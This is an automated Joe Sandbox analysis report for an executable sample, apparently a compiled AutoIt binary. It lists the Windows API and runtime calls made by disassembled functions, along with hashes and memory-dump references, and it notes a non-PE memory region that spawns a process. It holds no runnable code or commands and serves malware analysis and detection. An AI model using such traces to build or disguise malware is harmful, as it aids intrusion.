                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: e204a8822caac2cba36687617491987ce2c95d173a23ab34989bb7a94dc0e3a4
                                                                    • Instruction ID: c5671a5a6fd2407c7fa9194cd7592a22db1f0d95654a2c01ca5c7f8475d5316e
                                                                    • Opcode Fuzzy Hash: e204a8822caac2cba36687617491987ce2c95d173a23ab34989bb7a94dc0e3a4
                                                                    • Instruction Fuzzy Hash: C9114876910208FFDB208F64D844EAFB7B9EF04750F04546AF905D7300D271DE40A761
                                                                    APIs
                                                                      • Part of subcall function 00FD4EE5: _fseek.LIBCMT ref: 00FD4EFD
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039824
                                                                      • Part of subcall function 01039734: _wcscmp.LIBCMT ref: 01039837
                                                                    • _free.LIBCMT ref: 010396A2
                                                                    • _free.LIBCMT ref: 010396A9
                                                                    • _free.LIBCMT ref: 01039714
                                                                      • Part of subcall function 00FF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FF9A24), ref: 00FF2D69
                                                                      • Part of subcall function 00FF2D55: GetLastError.KERNEL32(00000000,?,00FF9A24), ref: 00FF2D7B
                                                                    • _free.LIBCMT ref: 0103971C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                    • Instruction ID: 4afedd58cf00ce7913c65af5796af4e147a2fb07d4db1add72a70585c1c3aa44
                                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                    • Instruction Fuzzy Hash: A1515EB1D04218ABDF259F64CC81AAEBBB9FF88304F04449EF649A3351DB755A80DF58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                    • Instruction ID: 84a10a5e1515a7a4a11fd636d2239fc07ef6499fbe990527bb19e031e6685ad0
                                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                    • Instruction Fuzzy Hash: 1941B576E0074E9BDB189E69C8809BF7BA5AF423B0B24813DEA15C7670D774ED41EB40
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0100EA39
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0100EA83
                                                                      • Part of subcall function 00FD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD4743,?,?,00FD37AE,?), ref: 00FD4770
                                                                      • Part of subcall function 00FF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FF07B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    • Opcode ID: e54368b19268b78ff23ff5a072890282e63380d13d9fb24b646c4c69a9157f67
                                                                    • Instruction ID: 689066bcfb18092f9f17283d6c478ff1da33bb03ed297b7c20d8e4afa59cc38e
                                                                    • Opcode Fuzzy Hash: e54368b19268b78ff23ff5a072890282e63380d13d9fb24b646c4c69a9157f67
                                                                    • Instruction Fuzzy Hash: 7F21D831A042489BDB52EF94CC45BEE7BF9AF49310F04805BF548BB381DBB855899FA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: 1b5539ece4b80f37105524d272c6181daa3fd00629bd1254ff2193e0ddea3ef4
                                                                    • Instruction ID: 28c219dacfa6668c8a282566e904a5e9b12f5bf21998ddc0dd9a3335738ba6c0
                                                                    • Opcode Fuzzy Hash: 1b5539ece4b80f37105524d272c6181daa3fd00629bd1254ff2193e0ddea3ef4
                                                                    • Instruction Fuzzy Hash: 3001F9718042187EDB18DAA8CC5AEFE7BFCDF11701F00419FF692D2181E478E6048760
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 015821BD
                                                                    • ExitProcess.KERNEL32(00000000), ref: 015821DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2063593989.0000000001581000.00000040.00000020.00020000.00000000.sdmp, Offset: 01581000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1581000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CreateExit
                                                                    • String ID: D
                                                                    • API String ID: 126409537-2746444292
                                                                    • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                    • Instruction ID: f287c42f7bf1e47ccac162125440ac6ff12832e138fca035da8d68c24fc1a8a9
                                                                    • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                    • Instruction Fuzzy Hash: D9F0ECB594024DABDB60EFE0CC49FEE77BCBF44701F508508FB0AAA184DA74D6088B61
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 010398F8
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0103990F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: 5291de6213422bd7cc2a3526edc12be37785e9b9dbf174d48dc6235ebf2146e2
                                                                    • Instruction ID: 3ed883f082eb4318f2e8d3ad0da3ef950b95a87ddecc0c87d8315006a6f0b1d4
                                                                    • Opcode Fuzzy Hash: 5291de6213422bd7cc2a3526edc12be37785e9b9dbf174d48dc6235ebf2146e2
                                                                    • Instruction Fuzzy Hash: A5D05B7554030DABDB60AA90DC0DF97773CD704700F0042A1BAD495051D97555548B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a50416cec7d0993ed3e26a4449b0371402967b0dc2f08114517266a6df77736d
                                                                    • Instruction ID: 1e2327187577d2d8493fd558535acb842e1c41e7bb2694bb2c93463619a768a8
                                                                    • Opcode Fuzzy Hash: a50416cec7d0993ed3e26a4449b0371402967b0dc2f08114517266a6df77736d
                                                                    • Instruction Fuzzy Hash: D1F146B06083419FDB14DF28C980A6ABBE5FF88314F44896EF8999B351D774E945CF82
                                                                    APIs
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
                                                                      • Part of subcall function 00FF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1
                                                                      • Part of subcall function 00FE60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FDF930), ref: 00FE6154
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FDF9CD
                                                                    • OleInitialize.OLE32(00000000), ref: 00FDFA4A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 010145C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    • Opcode ID: 995e0edca6da6d27cfebeb7bd8367e3d5fe10e171bd3a801c63be80998465b08
                                                                    • Instruction ID: d041e13584f2149031e17c0b60f9426308e6d28bdf6fde8db861e83e1042a23d
                                                                    • Opcode Fuzzy Hash: 995e0edca6da6d27cfebeb7bd8367e3d5fe10e171bd3a801c63be80998465b08
                                                                    • Instruction Fuzzy Hash: 1381C0B0A052408FC7A6EF3BEC716197BE5FB9830AB50812B90D8CB359EB7E45059F51
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00FD4370
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD4415
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FD4432
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$_memset
                                                                    • String ID:
                                                                    • API String ID: 1505330794-0
                                                                    • Opcode ID: 4d6820ed706dca67085618c4886ea8f1106e40a8bd932e9c4f9f21a28d4246d5
                                                                    • Instruction ID: 1bd867febc869b111468fc70d18209ca70299c8768170916b8c953fa9a050a7f
                                                                    • Opcode Fuzzy Hash: 4d6820ed706dca67085618c4886ea8f1106e40a8bd932e9c4f9f21a28d4246d5
                                                                    • Instruction Fuzzy Hash: C1318FB09047019FD731DF24D88469BBBE8FB49318F04096FF6DA82381E775A944DB92
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00FF5733
                                                                      • Part of subcall function 00FFA16B: __NMSG_WRITE.LIBCMT ref: 00FFA192
                                                                      • Part of subcall function 00FFA16B: __NMSG_WRITE.LIBCMT ref: 00FFA19C
                                                                    • __NMSG_WRITE.LIBCMT ref: 00FF573A
                                                                      • Part of subcall function 00FFA1C8: GetModuleFileNameW.KERNEL32(00000000,010933BA,00000104,?,00000001,00000000), ref: 00FFA25A
                                                                      • Part of subcall function 00FFA1C8: ___crtMessageBoxW.LIBCMT ref: 00FFA308
                                                                      • Part of subcall function 00FF309F: ___crtCorExitProcess.LIBCMT ref: 00FF30A5
                                                                      • Part of subcall function 00FF309F: ExitProcess.KERNEL32 ref: 00FF30AE
                                                                      • Part of subcall function 00FF8B28: __getptd_noexit.LIBCMT ref: 00FF8B28
                                                                    • RtlAllocateHeap.NTDLL(01500000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 62d60e9f73b6ee96ca8c3faa39d4145a9abd170171c19e9ef111a43720b01a7e
                                                                    • Instruction ID: 2f4c88bd63d68d2651d95ae1bc5e6e88ef3d7648877da3fdf51fcec915b9f9d2
                                                                    • Opcode Fuzzy Hash: 62d60e9f73b6ee96ca8c3faa39d4145a9abd170171c19e9ef111a43720b01a7e
                                                                    • Instruction Fuzzy Hash: 1301D237700B0EDAD6213B34EC52B7E7748AF82B72F210025F7059A1A1DEB898017B60
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01039548,?,?,?,?,?,00000004), ref: 010398BB
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01039548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010398D1
                                                                    • CloseHandle.KERNEL32(00000000,?,01039548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010398D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 8f9aab16a74a63a887a4736f54e04e2caae8085c635a6333e754403f4c62180b
                                                                    • Instruction ID: 2b3bba269b4c4f23d6c26ff0802e42ef6b86f9823e9629957797859569f12c2f
                                                                    • Opcode Fuzzy Hash: 8f9aab16a74a63a887a4736f54e04e2caae8085c635a6333e754403f4c62180b
                                                                    • Instruction Fuzzy Hash: FAE08632141315B7E7312B54EC09FCB7F59AB46764F108110FB94A90D087BA15119798
                                                                    APIs
                                                                    • _free.LIBCMT ref: 01038D1B
                                                                      • Part of subcall function 00FF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FF9A24), ref: 00FF2D69
                                                                      • Part of subcall function 00FF2D55: GetLastError.KERNEL32(00000000,?,00FF9A24), ref: 00FF2D7B
                                                                    • _free.LIBCMT ref: 01038D2C
                                                                    • _free.LIBCMT ref: 01038D3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction ID: 42c748a43608b1a2133fcc58bab025b9d7f753d5fcfcf76420a9e7cea1a108b4
                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction Fuzzy Hash: 3BE0C2A160160842DBA0B57CAC45AA723DC4F887527044A8EBA4DD7152CE68F4429024
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CALL
                                                                    • API String ID: 0-4196123274
                                                                    • Opcode ID: 110339f54d881655c71ee5f47725ffb5db5228758625149da94bd23a60260fe5
                                                                    • Instruction ID: ef639e47282c6f7975a7d88f41792b7835187fffbec0166894c4075d77037ab1
                                                                    • Opcode Fuzzy Hash: 110339f54d881655c71ee5f47725ffb5db5228758625149da94bd23a60260fe5
                                                                    • Instruction Fuzzy Hash: EC227C71908301DFDB25DF14C490B2AB7E2BF84310F19895EE89A8B361DB35EC45EB86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 4104443479-3962188686
                                                                    • Opcode ID: 3183e9951e68587ef83a5b511530da70b1bebd50f846702a00c6b9f44605de81
                                                                    • Instruction ID: 8b88cec139b8e9d51f8f0863a584dc564f57e0c1b76f77df8cde591c28e37a9e
                                                                    • Opcode Fuzzy Hash: 3183e9951e68587ef83a5b511530da70b1bebd50f846702a00c6b9f44605de81
                                                                    • Instruction Fuzzy Hash: 63415B22E041586BDF229B948C917BE7FA39B45310F2C4477ED86DB382D634BD44B7A1
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00FD4834
                                                                      • Part of subcall function 00FF336C: __lock.LIBCMT ref: 00FF3372
                                                                      • Part of subcall function 00FF336C: DecodePointer.KERNEL32(00000001,?,00FD4849,01027C74), ref: 00FF337E
                                                                      • Part of subcall function 00FF336C: EncodePointer.KERNEL32(?,?,00FD4849,01027C74), ref: 00FF3389
                                                                      • Part of subcall function 00FD48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FD4915
                                                                      • Part of subcall function 00FD48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FD492A
                                                                      • Part of subcall function 00FD3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD3B68
                                                                      • Part of subcall function 00FD3B3A: IsDebuggerPresent.KERNEL32 ref: 00FD3B7A
                                                                      • Part of subcall function 00FD3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010952F8,010952E0,?,?), ref: 00FD3BEB
                                                                      • Part of subcall function 00FD3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FD3C6F
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FD4874
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 1438897964-0
                                                                    • Opcode ID: 10777bfcaf87287fd6ece23b87f16f174da25cea061c54a091829269b4c189b9
                                                                    • Instruction ID: 180063fde083afb6c0a144a69151c560e11d3b17b607c46a483cbec8ff4c8dad
                                                                    • Opcode Fuzzy Hash: 10777bfcaf87287fd6ece23b87f16f174da25cea061c54a091829269b4c189b9
                                                                    • Instruction Fuzzy Hash: 6F119D719083459BC710EF69DC1590EBFE9FF89750F10451FF080972A1DBBAA544DB92
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00FD5821,?,?,?,?), ref: 00FD5CC7
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00FD5821,?,?,?,?), ref: 0100DD73
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 0435a3707f0ab58d2f0c1f53ab119aba0806b11d1c7bc3fb265731d548715422
                                                                    • Instruction ID: 74faa84caffba69d58b990fc6f3772bf318a69a515cbc351444eae6946b71931
